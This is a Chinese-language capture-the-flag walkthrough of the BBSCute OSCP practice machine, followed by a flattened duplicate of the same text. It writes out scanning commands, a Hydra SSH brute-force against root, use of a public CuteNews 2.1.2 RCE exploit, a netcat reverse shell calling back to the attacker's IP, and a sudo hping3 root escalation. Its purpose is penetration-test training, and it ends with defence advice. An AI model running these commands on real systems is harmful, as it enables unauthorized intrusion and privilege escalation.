从WEB到内网&&信息收集&&SSH爆破&&SUDO提权 ------打靶经验分享
字数 1453 2025-08-10 14:13:03

OSCP靶机渗透实战:BBSCute靶机攻防教学

靶机概述

本次实战的目标是OSCP认证考试中的BBSCute靶机,难度中等。攻击过程涉及端口探测、服务识别、SSH爆破、Web应用漏洞利用、反弹Shell建立以及SUDO提权等多个渗透测试关键环节。靶机包含两个flag:一个可通过低权限Shell获取,另一个需要提权后才能访问。

环境配置

  • 攻击机IP: 192.168.45.193
  • 目标靶机IP: 192.168.164.128
  • VPN连接: 使用OpenVPN连接靶场网络

信息收集阶段

1. 端口扫描

使用Nmap进行全端口扫描,识别开放服务:

nmap --min-rate 10000 -p- 192.168.164.128

扫描结果:

  • 22端口:SSH服务
  • 80端口:HTTP服务
  • 88端口:HTTP服务
  • 110端口:POP3服务
  • 995端口:SSL/POP3服务

2. 服务版本探测

对开放端口进行服务版本识别:

nmap -p 22,80,88,110,995 -sV 192.168.164.128

详细服务信息:

  • 22端口:OpenSSH 7.9p1 Debian
  • 80端口:Apache HTTP服务
  • 88端口:HTTP服务
  • 110端口:POP3服务
  • 995端口:SSL/POP3服务

3. 端口测试

3.1 SSH服务(22端口)

检查SSH服务可利用性:

  • 搜索OpenSSH 7.9p1的已知漏洞: 
    searchsploit openssh 7.9
msfconsole
  • 尝试弱口令登录: 
    ssh root@192.168.164.128 -p 22
  • 使用Hydra进行SSH爆破: 
    hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 -vV 192.168.164.128 ssh -s 22

3.2 HTTP服务(80端口)

Web应用测试:

  • 直接访问: 
    curl http://192.168.164.128:80
  • 目录扫描: 
    dirsearch -u http://192.168.164.128:80
  • CMS识别: 
    whatweb http://192.168.164.128/index.php
    识别结果为Cutenews CMS,版本2.1.2

3.3 HTTP服务(88端口)

初步访问未发现可利用点,暂不深入。

攻击阶段

1. Cutenews CMS漏洞利用

识别到Cutenews 2.1.2存在已知漏洞:

searchsploit cutenews 2.1.2

发现远程代码执行漏洞(ExploitDB ID: 48800)

复制并修改漏洞利用脚本:

cp /usr/share/exploitdb/exploits/php/webapps/48800.py exp

修改脚本中的路径问题(原脚本包含"CuteNews/"路径,而目标系统直接使用index.php):

sed -i 's:CuteNews/::g' 48800.py

执行漏洞利用:

python3 48800.py

输入目标URL:http://192.168.164.128:80

成功获取初始Shell。

2. 建立稳定Shell连接

为提高交互性,建立反向Shell连接:

  1. 攻击机启动监听: 
    nc -lvvp 1234
  2. 目标机执行反弹Shell: 
    nc -e /bin/bash 192.168.45.193 1234
  3. 升级Shell交互性: 
    python -c "import pty;pty.spawn('/bin/bash')";

3. 获取第一个flag

查找并读取低权限flag:

find / -name local.txt
cat /var/www/local.txt

权限提升阶段

1. 检查sudo权限

查看当前用户的sudo权限:

sudo -l

发现hping3命令可以以root权限执行。

2. 利用hping3提权

参考GTFOBins中的hping3提权方法:

sudo hping3 --interactive

在交互模式中直接获取root shell。

3. 获取root flag

读取root目录下的flag:

cat /root/proof.txt

关键知识点总结

  1. 信息收集:全面的端口扫描和服务识别是渗透测试的基础
  2. 漏洞搜索:熟练使用searchsploit和Metasploit查找已知漏洞
  3. 脚本修改:能够根据目标环境调整漏洞利用脚本
  4. Shell稳定化:通过反向连接和pty升级改善Shell交互性
  5. 权限提升:利用sudo权限配置不当进行提权
  6. 工具使用:熟练运用Nmap、Hydra、Dirsearch、WhatWeb等工具

防御建议

  1. 及时更新CMS系统和插件
  2. 限制sudo权限,避免不必要的root权限分配
  3. 配置SSH服务禁止root登录和使用强密码策略
  4. 定期进行安全审计和漏洞扫描
  5. 实施最小权限原则,限制服务账户权限

通过本案例的学习,可以掌握从信息收集到权限提升的完整渗透测试流程,对准备OSCP认证考试有重要参考价值。

OSCP靶机渗透实战:BBSCute靶机攻防教学 靶机概述 本次实战的目标是OSCP认证考试中的BBSCute靶机,难度中等。攻击过程涉及端口探测、服务识别、SSH爆破、Web应用漏洞利用、反弹Shell建立以及SUDO提权等多个渗透测试关键环节。靶机包含两个flag:一个可通过低权限Shell获取,另一个需要提权后才能访问。 环境配置 攻击机IP : 192.168.45.193 目标靶机IP : 192.168.164.128 VPN连接 : 使用OpenVPN连接靶场网络 信息收集阶段 1. 端口扫描 使用Nmap进行全端口扫描,识别开放服务: 扫描结果: 22端口:SSH服务 80端口:HTTP服务 88端口:HTTP服务 110端口:POP3服务 995端口:SSL/POP3服务 2. 服务版本探测 对开放端口进行服务版本识别: 详细服务信息: 22端口:OpenSSH 7.9p1 Debian 80端口:Apache HTTP服务 88端口:HTTP服务 110端口:POP3服务 995端口:SSL/POP3服务 3. 端口测试 3.1 SSH服务(22端口) 检查SSH服务可利用性: 搜索OpenSSH 7.9p1的已知漏洞: 尝试弱口令登录: 使用Hydra进行SSH爆破: 3.2 HTTP服务(80端口) Web应用测试: 直接访问: 目录扫描: CMS识别: 识别结果为Cutenews CMS,版本2.1.2 3.3 HTTP服务(88端口) 初步访问未发现可利用点,暂不深入。 攻击阶段 1. Cutenews CMS漏洞利用 识别到Cutenews 2.1.2存在已知漏洞: 发现远程代码执行漏洞(ExploitDB ID: 48800) 复制并修改漏洞利用脚本: 修改脚本中的路径问题(原脚本包含"CuteNews/"路径,而目标系统直接使用index.php): 执行漏洞利用: 输入目标URL:http://192.168.164.128:80 成功获取初始Shell。 2. 建立稳定Shell连接 为提高交互性,建立反向Shell连接: 攻击机启动监听: 目标机执行反弹Shell: 升级Shell交互性: 3. 获取第一个flag 查找并读取低权限flag: 权限提升阶段 1. 检查sudo权限 查看当前用户的sudo权限: 发现hping3命令可以以root权限执行。 2. 利用hping3提权 参考GTFOBins中的hping3提权方法: 在交互模式中直接获取root shell。 3. 获取root flag 读取root目录下的flag: 关键知识点总结 信息收集 :全面的端口扫描和服务识别是渗透测试的基础 漏洞搜索 :熟练使用searchsploit和Metasploit查找已知漏洞 脚本修改 :能够根据目标环境调整漏洞利用脚本 Shell稳定化 :通过反向连接和pty升级改善Shell交互性 权限提升 :利用sudo权限配置不当进行提权 工具使用 :熟练运用Nmap、Hydra、Dirsearch、WhatWeb等工具 防御建议 及时更新CMS系统和插件 限制sudo权限,避免不必要的root权限分配 配置SSH服务禁止root登录和使用强密码策略 定期进行安全审计和漏洞扫描 实施最小权限原则,限制服务账户权限 通过本案例的学习,可以掌握从信息收集到权限提升的完整渗透测试流程,对准备OSCP认证考试有重要参考价值。